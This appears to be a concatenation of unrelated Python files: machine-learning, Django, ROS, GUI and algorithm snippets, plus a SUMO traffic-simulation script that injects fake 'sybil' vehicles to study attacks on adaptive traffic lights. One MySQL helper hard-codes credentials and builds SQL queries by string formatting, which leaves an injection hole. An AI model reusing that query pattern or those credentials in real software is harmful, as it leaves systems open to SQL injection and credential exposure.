training_set_loc = prefix + 'training_set.csv'
testing_set_loc = prefix + 'test_set.csv'
results_loc = prefix + 'output_set_binary_multiclasser.csv'
class MultiClassNaiveBayesClassifier:
def __init__(self, best_item_loc=False):
self.accuracies = {}
self.classifiers = {}
self.dvs = {}
def store_actual_labels(self, data):
for datum in data:
if 'actual_label' not in list(datum.keys()):
datum['actual_label'] = datum['label']
def train_with_data(self, data):
self.accuracies = {}
self.classifiers = {}
self.store_actual_labels(data)
# Enumerate labels, split data by labels
dv_split_data = {}
for datum in data:
dv = datum['actual_label']
try:
dv_split_data[dv].append(datum)
except KeyError:
dv_split_data[dv] = []
dv_split_data[dv].append(datum)
# Make a copy of the data to freely manipulate
self.dvs = list(dv_split_data.keys())
# Generate splitter list and classifiers
for dv_1 in self.dvs:
for dv_2 in self.dvs:
if dv_1 < dv_2:
# Make a subset of data
working_data = []
working_data.extend(dv_split_data[dv_1])
working_data.extend(dv_split_data[dv_2])
# Get accuracies of each splitter
classifier = NaiveBayesClassifier()
self.make_data_true_on_sole_dv(working_data, dv_1)
accuracy = classifier.n_fold_validate(working_data, 0)
try:
self.accuracies[dv_1][dv_2] = round(accuracy, 4)
except KeyError:
self.accuracies[dv_1] = {}
self.accuracies[dv_1][dv_2] = round(accuracy, 4)
# Retrain with all data
classifier.train_with_data(working_data)
try:
self.classifiers[dv_1][dv_2] = classifier
except KeyError:
self.classifiers[dv_1] = {}
self.classifiers[dv_1][dv_2] = classifier
def test_with_data(self, data):
correct_count = 0
for datum in data:
if datum["actual_label"] == self.predict(datum["features"]):
correct_count += 1
return correct_count / len(data)
def predict(self, features):
confidences = {}
for dv in self.dvs:
confidences[dv] = 0.0
for dv_1 in self.dvs:
for dv_2 in self.dvs:
if dv_1 < dv_2:
prediction = self.classifiers[dv_1][dv_2].predict(features)
reliability = self.accuracies[dv_1][dv_2]
if prediction == 1:
winner = dv_1
else:
winner = dv_2
confidences[winner] += reliability
# Find best confidence
best = self.dvs[0]
for dv in self.dvs:
if confidences[dv] > confidences[best]:
best = dv
return best
def make_data_true_on_sole_dv(self, data, target_dv):
for datum in data:
datum['label'] = int(datum['actual_label'] == target_dv)
def n_fold_validate(self, data, sample_count):
self.store_actual_labels(data)
subset_list = []
list_size = len(data)
for i in range(sample_count):
subset_list.append(data[int(i * list_size / sample_count):int((i + 1) * list_size / sample_count)])
total_accuracy = 0.0
for i in range(sample_count):
data_set_without_chosen_sample = []
for j in range(sample_count):
if i != j:
data_set_without_chosen_sample += subset_list[j]
chosen_sample = subset_list[i]
self.train_with_data(data_set_without_chosen_sample)
accuracy = self.test_with_data(chosen_sample)
print("Accuracy for round " + str(i) + " is " + str(round(accuracy, 3)))
total_accuracy += accuracy
total_accuracy /= sample_count
return total_accuracy
# Run the code.
shared_library.main(
Model=MultiClassNaiveBayesClassifier,
training_set_loc=training_set_loc,
testing_set_loc=testing_set_loc,
results_loc=results_loc,
iv_count=iv_count,
validation_count=validation_count
)
|
# pylint: disable=duplicate-code, too-many-statements
''' Unit test for basic commands '''
import unittest
import logging
from test.common import async_test, BaseTestCase
# Initialize loggers
logging.basicConfig(level=logging.WARNING)
class TestCommand(BaseTestCase):
''' Test basic commands '''
@async_test
async def test_start(self):
''' Test start command '''
user = self.user
await user.send_message('/start')
message = await user.get_message()
self.assertTrue(message is not None)
self.assertTrue('To predict' in message.text)
@async_test
async def test_help(self):
''' Test help command '''
user = self.user
await user.send_message('/help')
message = await user.get_message()
self.assertTrue(message is not None)
self.assertTrue('To predict' in message.text)
@async_test
async def test_train_empty(self):
''' Test train command with empty argument '''
user = self.user
await user.send_message('/train')
message = await user.get_message()
self.assertTrue(message is not None)
self.assertTrue('/train' in message.text)
self.assertTrue('Example' in message.text)
@async_test
async def test_train_tag(self):
''' Test train command with tag '''
user = self.user
tag = 'test123'
# Test /train <tag>
await user.send_message('/train {}'.format(tag))
message = await user.get_message()
self.assertTrue(message is not None)
self.assertTrue(tag in message.text)
# Test /done
await user.send_message('/done')
message = await user.get_message()
self.assertTrue(message is not None)
self.assertTrue(tag in message.text)
# Test /done again
await user.send_message('/done')
message = await user.get_message()
self.assertTrue(message is not None)
self.assertTrue(tag not in message.text)
if __name__ == '__main__': # pragma: no cover
unittest.main()
|
from django.conf.urls import patterns, url
from apps.inicio.views import index2
urlpatterns = patterns('apps.inicio.views',
url(r'^$','index_view', name="index"),
url(r'^index/', index2.as_view()),
)
|
# Generated by Django 2.0.4 on 2018-04-28 06:57
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0005_remove_blogpage_post_title'),
]
operations = [
migrations.AddField(
model_name='blogpage',
name='banner_image',
field=models.ImageField(blank=True, upload_to='blogbanners'),
),
]
|
import os
import sys
import socket
import optparse
import subprocess
import random
import select
import struct
import binascii
import time
import threading
from traci import trafficlights, simulation, edge, junction
import traci.constants as tc
from datetime import datetime
from optparse import OptionParser
''' This script runs the simulation in a sybil attack on one junction only TLS is actuated with time gap '''
# to import python modules from the $SUMO_HOME/tools directory
try:
sys.path.append(os.path.join(os.path.dirname(
__file__), '..', '..', '..', '..', "tools")) # tutorial in tests
sys.path.append(os.path.join(os.environ.get("SUMO_HOME", os.path.join(
os.path.dirname(__file__), "..", "..", "..")), "tools")) # tutorial in docs
from sumolib import checkBinary
except ImportError:
sys.exit("please declare environment variable 'SUMO_HOME' as the root directory of your sumo installation (it should contain folders 'bin', 'tools' and 'docs')")
import traci
def run():
global ct
ct = 0
edgesList = []
vehicle_list = []
#junction '386' is of interest to our adaptive traffic control lets subscribe to it
junction_ID = '386'
traci.junction.subscribeContext(junction_ID, tc.CMD_GET_VEHICLE_VARIABLE, 42)
#la route que g cree pour les vehicules sybils
traci.route.add(routeID="r1",edges=["-479572754#1","-479572754#0", "-456316923"])
print 'CA CEST LE PROGRAM'
#print traci.trafficlights.getProgram('386')
#A chaque 100 secondes, je genere 6 vehicules sybiles dont les identifiants commencent par 10000000 et a partir de 28000s
d=28000
z=0
for i in range(40):
v1="10000000" + str(z)
v2="10000000" + str(z+1)
v3="10000000" + str(z+2)
v4="10000000" + str(z+3)
v5="10000000" + str(z+4)
v6="10000000" + str(z+5)
traci.vehicle.add(str(v1),"r1",depart=d, pos=0)
traci.vehicle.add(str(v2),"r1",depart=d, pos=0)
traci.vehicle.add(str(v3),"r1",depart=d, pos=0)
traci.vehicle.add(str(v4),"r1",depart=d, pos=0)
traci.vehicle.add(str(v5),"r1",depart=d, pos=0)
traci.vehicle.add(str(v6),"r1",depart=d, pos=0)
traci.vehicle.setColor(str(v1),(250,0,0,0))
traci.vehicle.setColor(str(v2),(250,0,0,0))
traci.vehicle.setColor(str(v3),(250,0,0,0))
traci.vehicle.setColor(str(v4),(250,0,0,0))
traci.vehicle.setColor(str(v5),(250,0,0,0))
traci.vehicle.setColor(str(v6),(250,0,0,0))
d=d+100
z=z+6
while ct < 32400000:
traci.simulationStep()
ct = simulation.getCurrentTime()
#Insertion de vehicules sybiles
p=traci.junction.getContextSubscriptionResults(junction_ID)
if p is not None:
temp=list(p)
for x in temp:
#g des vehicules sybiles que je ne veux pas coller a ma liste
if ((vehicle_list.count(x)==0) & (int(x)<10000000)):
vehicle_list.append(x)
outputVehicle = "Sybil_1_A_1/vehicles_around_junction" + junction_ID + str(opt.run) +".txt"
with open(outputVehicle,'w') as out:
for y in vehicle_list:
out.write(y + '\n')
out.close()
traci.close()
sys.stdout.flush()
def send_time(ct):
print sys.stderr, 'Sending time to server'
date = datetime.now()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = ('127.0.0.1', 8000)
sock.connect(server_address)
print sys.stderr, 'Starting communication with server', server_address, 'at %s' % date
t = struct.pack('>B I', 0, ct)
sock.sendall(t)
r = sock.recv(24)
if r:
if r == 'Time received':
print 'Valid time reception confirmation received'
else:
print 'Invalid time reception confirmation received'
else:
print 'No time reception confirmation received'
print 'Closing connection with server at %s' % date
sock.close()
def send(tlsID, tlsState):
print sys.stderr, 'Sending tlsState to server'
date = datetime.now()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = ('127.0.0.1', 8000)
sock.connect(server_address)
print sys.stderr, 'Starting communication with server', server_address, 'at %s' % date
request = struct.pack('>2B H', 0, 1, tlsID) # 0 = client = SUMO / 1 = mode = write
sock.sendall(request)
r = sock.recv(24)
if r:
if r == 'Waiting for data':
print 'Request for tlsState received'
sock.sendall(tlsState)
print 'tlsState sent from SUMO for %s : %s' % (tlsID, tlsState)
r = sock.recv(24)
format = '>B H %is' % len(tlsState)
data = struct.unpack(format, r) # data = (0, tlsID, tlsState)
if data[0] == 0 and data[1] == tlsID and data[2] == tlsState:
print 'Valid tlsState confirmation received'
else:
print 'Invalid tlsState confirmation received'
else:
print 'Invalid request confirmation received'
else:
print 'Not response from server'
print 'Closing connection with server at %s' % date
sock.close()
def get_tlsState(tlsID, tlsState):
print 'Getting tlsState'
date = datetime.now()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = ('127.0.0.1', 8000)
sock.connect(server_address)
print sys.stderr, 'Starting communication with server', server_address, 'at %s' % date
request = struct.pack('>2B H', 0, 0, tlsID) # 0 = client = SUMO / 0 = mode = read
sock.sendall(request)
r = sock.recv(24)
if r:
if r == '0':
print 'No tlsState for %s received' % tlsID
tlsState = None
else:
print 'tlsState for %s received' % tlsID
format = '>B H %is' % len(tlsState)
data = struct.unpack(format, r) # data = (0, tlsID, tlsState)
print 'Data received = ', data
if data[0] == 0 and data[1] == tlsID and len(data[2]) == len(tlsState):
print 'Valid tlsState value received'
tlsID = data[1]
tlsState = data[2]
else:
print 'Invalid tlsState value received'
else:
print 'Not response from server'
print 'Closing connection with server at %s' % date
sock.close()
return tlsState
if __name__ == "__main__":
options = OptionParser()
options.add_option("-r", "--run", help = "run id", dest="run", default = 1)
(opt,arg) = options.parse_args()
outputFile = "Sybil_1_A_1/tripInfo" + str(opt.run) + ".xml"
logFile = "Sybil_1_A_1/log" + str(opt.run) + ".xml"
print 'Sybil IS IN THE HOUSE'
seed = random.randint(1000, 10000)
# Starting Traci
#traci.start(['sumo-gui', "-c", "montreal_A_1.sumo.cfg", "-a", "montreal.additional.xml", "--step-length", "0.1"])
# to generate the tripInfo files in Sybil scenario for run number in the option
traci.start(['sumo', "-c", "montreal_A_1.sumo.cfg", "--step-length", "0.1", "--seed", str(seed), "--tripinfo-output", outputFile, '--duration-log.statistics', 'True', '--collision.action', 'warn', '--log', logFile])
run()
|
import Tkinter
GM_KEYS = set(
vars(Tkinter.Place).keys() +
vars(Tkinter.Pack).keys() +
vars(Tkinter.Grid).keys()
)
class ScrolledFrame(object):
_managed = False
# XXX These could be options
x_incr = 5
y_incr = 5
def __init__(self, master=None, **kw):
self.width = kw.pop('width', 200)
self.height = kw.pop('height', 200)
self._canvas = Tkinter.Canvas(master, **kw)
self.master = self._canvas.master
self._hsb = Tkinter.Scrollbar(orient='horizontal',
command=self._canvas.xview)
self._vsb = Tkinter.Scrollbar(orient='vertical',
command=self._canvas.yview)
self._canvas.configure(
xscrollcommand=self._hsb.set,
yscrollcommand=self._vsb.set)
self._placeholder = Tkinter.Frame(self._canvas)
self._canvas.create_window(0, 0, anchor='nw', window=self._placeholder)
self._placeholder.bind('<Map>', self._prepare_scroll)
for widget in (self._placeholder, self._canvas):
widget.bind('<Button-4>', self.scroll_up)
widget.bind('<Button-5>', self.scroll_down)
def __getattr__(self, attr):
if attr in GM_KEYS:
if not self._managed:
# Position the scrollbars now.
self._managed = True
if attr == 'pack':
self._hsb.pack(side='bottom', fill='x')
self._vsb.pack(side='right', fill='y')
elif attr == 'grid':
self._hsb.grid(row=1, column=0, sticky='ew')
self._vsb.grid(row=0, column=1, sticky='ns')
return getattr(self._canvas, attr)
else:
return getattr(self._placeholder, attr)
def yscroll(self, *args):
self._canvas.yview_scroll(*args)
def scroll_up(self, event=None):
self.yscroll(-self.y_incr, 'units')
def scroll_down(self, event=None):
self.yscroll(self.y_incr, 'units')
def see(self, event):
widget = event.widget
w_height = widget.winfo_reqheight()
c_height = self._canvas.winfo_height()
y_pos = widget.winfo_rooty()
if (y_pos - w_height) < 0:
# Widget focused is above the current view
while (y_pos - w_height) < self.y_incr:
self.scroll_up()
self._canvas.update_idletasks()
y_pos = widget.winfo_rooty()
elif (y_pos - w_height) > c_height:
# Widget focused is below the current view
while (y_pos - w_height - self.y_incr) > c_height:
self.scroll_down()
self._canvas.update_idletasks()
y_pos = widget.winfo_rooty()
def _prepare_scroll(self, event):
frame = self._placeholder
frame.unbind('<Map>')
if not frame.children:
# Nothing to scroll.
return
for child in frame.children.itervalues():
child.bind('<FocusIn>', self.see)
width, height = frame.winfo_reqwidth(), frame.winfo_reqheight()
self._canvas.configure(scrollregion=(0, 0, width, height),
yscrollincrement=self.y_incr, xscrollincrement=self.x_incr)
self._canvas.configure(width=self.width, height=self.height)
root = Tkinter.Tk()
sf = ScrolledFrame()
sf.grid(row=0, column=0, sticky='nsew')
sf.master.grid_columnconfigure(0, weight=1)
sf.master.grid_rowconfigure(0, weight=1)
for _ in range(10):
lbl = Tkinter.Label(sf, text="Hi")
lbl.pack()
btn = Tkinter.Button(sf, text="Buh")
btn.pack()
entry = Tkinter.Entry(sf)
entry.pack()
root.mainloop()
'''
from Xlib.display import Display
from Xlib.Xatom import STRING
display = Display()
root = display.screen().root
#view the current WM_NAME
print root.get_full_property(display.intern_atom('_NET_WM_NAME'), STRING)
import wnck
import subprocess
stacking_window_ids = subprocess.check_output("xprop -root _NET_CLIENT_LIST_STACKING", shell = True)[:-1] # exclude \n
lable, window_ids = stacking_window_ids.split("# ")
window_ids = window_ids.split(", ")
window_stack = []
for window_id in window_ids:
print window_id #, wnck.wnck_window_get_name(wnck.wnck_window_get(window_id))
import window_name_stack
import sys
window_title = window_stack.get()
print window_title
while 1:
new_window_title = window_stack.get()
if new_window_title != window_title :
window_title = new_window_title
print window_title
'''
|
import sys
import math
import pprint
def next_int(iter_lines):
return int(next(iter_lines))
def solve_testcases(solve_testcase):
iter_lines = iter(sys.stdin.readlines())
num_testcases = next_int(iter_lines)
for _ in range(num_testcases):
print(solve_testcase(iter_lines))
# Dijskra's shortest path algorithm
# https://practice.geeksforgeeks.org/problems/shortest-path-from-1-to-n/0
from collections import defaultdict
import heapq
class Graph:
def __init__(self):
# dictionary of nodes to their edges
self._edges = defaultdict(list)
# distances in the form (a,b): distance
# all distances are ordered
self._distances = {}
@classmethod
def from_num_nodes(cls, num_nodes):
graph = cls()
for node in range(1, num_nodes + 1):
j = node + 1
if j <= num_nodes:
graph.add_edge(node, j)
j = node * 3
if j <= num_nodes:
graph.add_edge(node, j)
return graph
def nodes(self):
return self._edges.values()
def distance(self, a, b):
return self._distances[self._convert_distance(a, b)]
def edges(self, a):
return self._edges[a]
def add_edge(self, a, b, distance=1):
"""Set edge from a -> b with a distance."""
self._edges[a].append(b)
# self._edges[b].append(a)
self._distances[self._convert_distance(a, b)] = distance
@staticmethod
def _convert_distance(a, b):
if b < a:
return (b, a)
return (a, b)
def dijskras_shortest_path(graph, start, dest):
visited = defaultdict(lambda: math.inf)
unvisited = [(0, start)]
# heapq.heapify(unvisited)
while unvisited:
# while there are unvisited nodes pick up each node and calculate
# the distance to all its children
distance, node = heapq.heappop(unvisited)
if distance > visited[node]:
continue
assert distance is not math.inf
visited[node] = distance
for child in graph.edges(node):
child_distance = distance + graph.distance(node, child)
if child_distance < visited[child]:
visited[child] = child_distance
heapq.heappush(unvisited, (child_distance, child))
return visited[dest]
def solve_shortest_path():
def solve_testcase(iter_lines):
num_nodes = next_int(iter_lines)
graph = Graph.from_num_nodes(num_nodes)
return dijskras_shortest_path(graph, 1, num_nodes)
solve_testcases(solve_testcase)
# solve_shortest_path()
# N = 887
# graph = Graph.from_num_nodes(N)
# print("Edges:")
# pprint.pprint(graph._edges)
# print("Distances:")
# pprint.pprint(graph._distances)
#
# print("Result:")
# print(dijskras_shortest_path(graph, 1, N))
|
import MySQLdb
import csv
class SGAEventsInfo:
def __init__(self):
self.db = MySQLdb.connect("localhost", "fanyu", "hellowork", "TDI")
self.cursor = self.db.cursor()
def findGeneName(self, geneID):
query = "SELECT gene_name FROM Genes WHERE gene_id= '%s'" %(geneID)
self.cursor.execute(query)
results = self.cursor.fetchall()
return results[0][0]
def findGeneId(self, geneName):
query = "SELECT gene_id FROM Genes WHERE gene_name= '%s'" %(geneName)
self.cursor.execute(query)
results = self.cursor.fetchall()
return results[0][0]
def findPatient(self, patient_id):
query = "SELECT name FROM Patients WHERE patient_id= '%s'" %(patient_id)
self.cursor.execute(query)
results = self.cursor.fetchall()
return results[0][0]
def findDriverTumor(self, geneId):
query = "SELECT T.patient_id, T.DEG_id FROM TDI_Results as T, SGAPPNoiseThreshold as S\
WHERE T.exp_id = 1 AND T.posterior >= S.threshold AND T.SGA_id = '%s' AND T.SGA_id = S.gene_id" %(geneId)
self.cursor.execute(query)
query_results = self.cursor.fetchall()
#key : (tumorid)
#value : DEG_id
tumor_DEG = {}
for row in query_results:
if tumor_DEG.has_key(row[0]):
tumor_DEG[row[0]].append(row[1])
else :
tumor_DEG[row[0]] = []
tumor_DEG[row[0]].append(row[1])
#filter out SGA which regulate less than 5 degs
tumor_DEG = dict((k,v) for k, v in tumor_DEG.iteritems() if len(v) >= 5)
return tumor_DEG
def countSGAEvents(self, geneId):
query = "SELECT COUNT(DISTINCT patient_id) FROM SGAs WHERE gene_id = '%s'" %(geneId)
self.cursor.execute(query)
query_results = self.cursor.fetchall()
return query_results[0][0]
#filter out drivers that has been called driver less than a certain number of tumors
def findSMEvents(self, geneId, tumor_DEG):
query = "SELECT DISTINCT patient_id FROM Somatic_Mutations WHERE gene_id = '%s' AND protein_func_impact = 1" %(geneId)
self.cursor.execute(query)
query_results = self.cursor.fetchall()
numberOfSMEvents = len(query_results)
if (numberOfSMEvents != 0):
numberOfSMDriverCall = 0
for row in query_results:
if tumor_DEG.has_key(row[0]):
numberOfSMDriverCall += 1
return (numberOfSMEvents, numberOfSMDriverCall, float(numberOfSMDriverCall)/numberOfSMEvents)
else:
return (0, 0, "NaN")
def findSCNAmpvents(self, geneId, tumor_DEG):
query = "SELECT DISTINCT patient_id FROM SCNAs WHERE gene_id = '%s' AND gistic_score = 2" %(geneId)
self.cursor.execute(query)
query_results = self.cursor.fetchall()
numberOfSCNAmpEvents = len(query_results)
if (numberOfSCNAmpEvents != 0):
numberOfSCNAmpDriverCall = 0
for row in query_results:
if tumor_DEG.has_key(row[0]):
numberOfSCNAmpDriverCall += 1
return (numberOfSCNAmpEvents, numberOfSCNAmpDriverCall, float(numberOfSCNAmpDriverCall)/numberOfSCNAmpEvents)
else:
return (0, 0, "NaN")
def findSCNDelEvents(self, geneId, tumor_DEG):
query = "SELECT DISTINCT patient_id FROM SCNAs WHERE gene_id = '%s' AND gistic_score = -2" %(geneId)
self.cursor.execute(query)
query_results = self.cursor.fetchall()
numberOfSCNDelEvents = len(query_results)
if (numberOfSCNDelEvents != 0):
numberOfSCNDelDriverCall = 0
for row in query_results:
if tumor_DEG.has_key(row[0]):
numberOfSCNDelDriverCall += 1
return (numberOfSCNDelEvents, numberOfSCNDelDriverCall, float(numberOfSCNDelDriverCall)/numberOfSCNDelEvents)
else:
return (0, 0, "NaN")
def findSGAEventsInforForAllSGA(self):
# cursor = self.db.cursor()
# query = "SELECT DISTINCT gene_id FROM SGAs WHERE gene_id IS NOT NULL"
# cursor.execute(query)
# query_results = cursor.fetchall()
tableName = "SGAEvents"
drivers = self.findDriver(30)
print len(drivers)
with open("%s.csv"%(tableName), 'wb') as csvfile:
writer=csv.writer(csvfile, delimiter=',',)
writer.writerow(["SGA", "#SGAEvents", "#SGA-FI Call", "CallRate", "#SMEvents", "#SM-FI Call", "SMCallRate", "#SCNAmpEvents", "#SCNAmp-FI call", "SCNAmp-FICallRate", "#SCNDelEvents", "#SCNDel-FI call", "SCNDel-FICallRate"])
# for row in query_results:
# driver = row[0]
for driver in drivers:
numberOfSGAEvents = self.countSGAEvents(driver)
if (numberOfSGAEvents >= 30):
tumor_DEG = self.findDriverTumor(driver)
numberOfSGADriverCall = len(tumor_DEG.keys())
SGAEventsInfo = (numberOfSGAEvents, numberOfSGADriverCall, float(numberOfSGADriverCall)/numberOfSGAEvents)
SMEventsInfo = self.findSMEvents(driver, tumor_DEG)
SCNAmpEventsInfo = self.findSCNAmpvents(driver, tumor_DEG)
SCNDelEventsInfo = self.findSCNDelEvents(driver, tumor_DEG)
SGA = self.findGeneName(driver)
print SGA
# print SGAEventsInfo
# print SMEventsInfo
# print SCNAmpEventsInfo
# print SCNDelEventsInfo
writer.writerow([SGA, SGAEventsInfo[0], SGAEventsInfo[1], SGAEventsInfo[2], SMEventsInfo[0], SMEventsInfo[1], SMEventsInfo[2], SCNAmpEventsInfo[0], SCNAmpEventsInfo[1], SCNAmpEventsInfo[2], SCNDelEventsInfo[0], SCNDelEventsInfo[1], SCNDelEventsInfo[2]])
print "done"
def findDriver(self, threshold):
#find all TDI records that satisfy the posterior threshold
query = "SELECT T.patient_id, T.SGA_id, T.DEG_id FROM TDI_Results as T, SGAPPNoiseThreshold as S\
WHERE T.exp_id = 1 AND T.posterior >= S.threshold AND T.SGA_id = S.gene_id"
self.cursor.execute(query)
query_results = self.cursor.fetchall()
#organize TDI records to a dictionary, key is (tumorid , SGA_id), value is DEG_id
tumor_SGA = {}
for row in query_results:
temp_tuple = (row[0], row[1])
if tumor_SGA.has_key(temp_tuple):
tumor_SGA[temp_tuple].append(row[2])
else :
tumor_SGA[temp_tuple] = []
tumor_SGA[temp_tuple].append(row[2])
#filter out SGA which regulate less than 5 degs
tumor_SGA = dict((k,v) for k, v in tumor_SGA.iteritems() if len(v) >= 5)
#extract driver from dictionary tumor_SGA
SGA_tumor = {}
for key in tumor_SGA:
if SGA_tumor.has_key(key[1]):
SGA_tumor[key[1]].append(key[0])
else:
SGA_tumor[key[1]] = []
SGA_tumor[key[1]].append(key[0])
SGA_tumor_subset = dict((k,v) for k, v in SGA_tumor.iteritems() if len(v) >= threshold)
return SGA_tumor_subset.keys()
def main():
tdi = SGAEventsInfo()
tdi.findSGAEventsInforForAllSGA()
if __name__ == "__main__":
main()
|
from selenium.webdriver.common.by import By
from .abstract import PageElement
from .abstract import PageObject
class SignUpPage(PageObject):
username = PageElement(By.CSS_SELECTOR, "#id_sign_up_form #id_username")
email = PageElement(By.CSS_SELECTOR, "#id_sign_up_form #id_email")
password = PageElement(By.CSS_SELECTOR, "#id_sign_up_form #id_password1")
password_confirmation = PageElement(
By.CSS_SELECTOR, "#id_sign_up_form #id_password2"
)
sign_up = PageElement(By.CSS_SELECTOR, "#id_sign_up_form #id_sign_up_submit")
next = PageElement(By.CSS_SELECTOR, "#id_sign_up_form #id_sign_up_next")
|
import matplotlib.pyplot as plt
import numpy as np
JOULE_TO_EV = 6.24E18 # [eV/J]
EV_TO_JOULES = 1.6022E-19 # [J/eV]
PLANCK_CONST = 6.63E-34 # [J*s]
SPEED_OF_LIGHT = 3.0E8 # [m*s^-1]
CHARGE_E = 1.602E-19 # [C]
POTASSIUM_WORK_FUNCTION = 3.67E-19 # [J]
frequencies = np.linspace(100, 300, num=600)
# Filter measurements
yerrors = [0.96, 0.81, 0.29]
stopping_pontentials = np.array([1.23, 0.88, 0.56])
filter_frequencies = np.array([274E12, 229E12, 172E12])
filter_data_points = [filter_frequencies, stopping_pontentials]
coefficients, residuals = np.polyfit(filter_data_points[0],
filter_data_points[1],
deg=1, cov=True)
slope = coefficients[0]*1E12
slope_uncertainty = np.abs(residuals[0][0])
intercept = coefficients[1]
intercept_uncertainty = np.abs(residuals[1][1])
observed = slope*frequencies + intercept
model_slope = (PLANCK_CONST*1E12/CHARGE_E)
model_intercept = (POTASSIUM_WORK_FUNCTION*EV_TO_JOULES*1E12/CHARGE_E)
photoelectric_model = model_slope*frequencies - model_intercept
work_function_prediction = intercept * -CHARGE_E * JOULE_TO_EV
work_function_prediction_uncertainty = intercept_uncertainty * \
CHARGE_E * JOULE_TO_EV
plancks_const_prediction = coefficients[0] * CHARGE_E
plancks_const_uncertainty = slope_uncertainty
plancks_const_prediction
plancks_const_uncertainty
# Plot data points and quadratic fit
fig, ax = plt.subplots()
ax.plot(frequencies, observed, label="Observed fit", linestyle="--")
ax.errorbar(filter_frequencies*1E-12, stopping_pontentials,
yerr=[yerrors, yerrors], fmt='o', label="Stopping potentials")
ax.plot(frequencies, photoelectric_model, label="Actual")
ax.set(title="Stopping Voltage vs. Frequency",
xlabel="Frequency (THz)",
ylabel="Voltage (V)")
ax.legend(loc='upper left')
plt.grid(True)
fig.savefig('plots/observation_vs_model.png')
fig.show()
|
from django.db import models
# Create your models here.
class Mentee(models.Model):
nama_mentee = models.CharField(max_length = 255)
testimoni = models.CharField(max_length = 300)
# foto_mentee = models.CharField(max_length = 300)
foto_mentee = models.ImageField(upload_to = 'upload')
def __str__(self):
return self.nama_mentee |
#ToDo: packaged this |
i = [[1,2,3],[4,5,6],[7,8,9]]
i[0][0]
print(i[0][0])
# go to first list and grab first item of that list
j = []
for x in range(10):
j.append(0)
print(j)
j = [0] * 10
print(j)
j = []
for x in range(10):
k = [0]*10
j.append(k)
print(j)
j = [[0]*10 for x in range(10)]
print(j)
for x in range(len(j)):
print(*j[x]) # * takes out the syntax |
#!/usr/bin/env python
import rospy
import tf
import math
import numpy as np
import matplotlib.pyplot as plt
from ga.gasearch import GASearch
from aStar.aStarSearch import aStar
from nav_msgs.msg import OccupancyGrid, MapMetaData
from sensor_msgs.msg import PointCloud
from geometry_msgs.msg import Point32, Point
# Global Variables
path_pub = None
# set True for GA or False for A*
RUN_GA = True
# Enable debug Viz
DEBUG = True
# robot's current position
cur_pos = None
# 2D array occupancy grid, 0 = empty and anything else (should be set to 1) is occupied
space = None
# Reorientation factor to account for map not aligning with robot initial heading
# (scale, origin_x, origin_y, origin_theta)
reorient_vector = (1, 0, 0)
width = 0
height = 0
searchy = GASearch(population_size=500)
def receive_cur_pos(position):
global cur_pos
cur_pos = (position.x, position.y)
def map_update(ogrid):
global space, reorient_vector, height, width
info = ogrid.info
space = np.reshape(ogrid.data, (info.height, info.width))
space = np.transpose(space)
space[space != 0] = 1
width = info.width
height = info.height
reorient_vector = (
info.resolution, info.origin.position.x, info.origin.position.y)
searchy.set_world(space)
print("reorient_vector", reorient_vector)
def world_point_to_grid(pt, scale = 1):
pt_x = ((pt[0] - reorient_vector[1]) / reorient_vector[0])*scale
pt_y = ((pt[1] - reorient_vector[2]) / reorient_vector[0])*scale
return (int(pt_y), int(pt_x))
def grid_point_to_world(pt, scale = 1):
pt_x = pt[1] / scale * reorient_vector[0] + reorient_vector[1]
pt_y = pt[0] / scale * reorient_vector[0] + reorient_vector[2]
return (pt_x, pt_y)
gen = 0
def run_ga():
global gen
if space is None or cur_pos is None:
return
# path should start at the robot's current position
best_path = searchy.search(world_point_to_grid(cur_pos), (300, 400), iters=500, init_pop=(gen == 0))
gen += 1
if DEBUG:
plt.clf()
plt.ion()
plt.imshow(searchy.world, interpolation='none')
for i in range(0, len(best_path.pts) - 1):
pt1 = [best_path.pts[i][0], best_path.pts[i + 1][0]]
pt2 = [best_path.pts[i][1], best_path.pts[i + 1][1]]
plt.plot(pt1, pt2, marker='o', color='green')
plt.title("gen: " + str(gen * 500))
plt.draw()
plt.show()
plt.pause(0.00001)
# ff our path is complete
if best_path.score < 1:
# best_path is a list of points forming the path. send to planning_node.
pathcloud = PointCloud()
pathcloud.header.stamp = rospy.Time.now()
pathcloud.points = []
for path_pt in best_path.pts:
point = Point32()
point.x, point.y = grid_point_to_world(path_pt)
pathcloud.points.append(point)
path_pub.publish(pathcloud)
def run_astar():
if space is None or cur_pos is None:
return
# Scaling
scale = 5
pos = world_point_to_grid(cur_pos)
start = [pos[0]//scale, pos[1]//scale]
goal = [300//scale, 400//scale]
# run A* to create the path
search = aStar(space, start, goal)
search.convertSpace(space, scale)
path = search.grid_astar()
best_path = search.convert(path)
search.display(start, best_path)
# best_path is a list of points forming the path. send to planning_node.
pathcloud = PointCloud()
pathcloud.header.stamp = rospy.Time.now()
pathcloud.points = []
# include start point
point = Point32()
point.x, point.y = grid_point_to_world(start, scale)
pathcloud.points.append(point)
for path_pt in best_path:
point = Point32()
point.x, point.y = grid_point_to_world(path_pt, scale)
pathcloud.points.append(point)
path_pub.publish(pathcloud)
def main():
global path_pub
# initialize node
rospy.init_node('mapping_node', anonymous=True)
# subscribe to the robot's current position (use as start of path)
# use "/move_base/global_costmap/costmap" if slam works goodly
map_sub = rospy.Subscriber("/move_base/global_costmap/costmap", OccupancyGrid, map_update, queue_size=1)
# publish command to follow path
path_pub = rospy.Publisher("/bb/path", PointCloud, queue_size=1)
# subscribe to the robot's current position (use as start of path)
pos_sub = rospy.Subscriber("/bb/pos", Point, receive_cur_pos, queue_size=1)
rate = rospy.Rate(1) # 1Hz, doesn't really matter since it'll take longer.
while not rospy.is_shutdown():
# check whether we are using A* or GA to generate the path
if RUN_GA:
# run the GA to create the path
run_ga()
else:
# run A* to create the path
run_astar()
rate.sleep()
if __name__ == '__main__':
try:
main()
except rospy.ROSInterruptException:
pass
|
import numpy as np
import helios
networkSize = 1000;
positions = np.random.random((networkSize, 3));
edges = np.random.randint(0,networkSize-1,(networkSize, 2));
positions = np.ascontiguousarray(positions,dtype=np.float32);
edges = np.ascontiguousarray(edges,dtype=np.uint64);
speeds = np.zeros(positions.shape,dtype=np.float32);
speeds = np.ascontiguousarray(speeds,dtype=np.float32);
for i in range(100):
helios.layout(edges,positions,speeds);
print(positions);
|
# Generated by Django 2.1.5 on 2019-02-13 00:15
from django.db import migrations, models
class Migration(migrations.Migration):
